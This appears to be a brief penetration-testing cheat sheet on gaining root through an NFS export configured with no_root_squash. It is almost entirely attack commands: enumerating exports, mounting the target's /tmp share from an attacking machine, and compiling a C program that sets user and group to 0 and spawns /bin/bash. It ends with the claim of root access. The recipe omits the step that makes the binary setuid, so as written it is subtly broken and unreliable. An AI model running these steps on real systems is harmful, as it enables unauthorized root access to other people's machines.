NFS Root Squashing
Enumeration
cat /etc/exports
in our example the "no root squash is defined for the tmp export. The folder is sharable and can be mounted
Exploitation
In our attacking machine
showmount -e IP-OF-TARGET
list the mountable folder of our targetmkdir /tmp/1
mount -o rw,vers=2 10.10.32.193:/tmp /tmp/1
we mount our folderecho 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/1/x.c
gcc /tmp/1/x.c -o /tmp/1/x
In our target
/tmp/x
we can execute our binaryWe should be root!
Last updated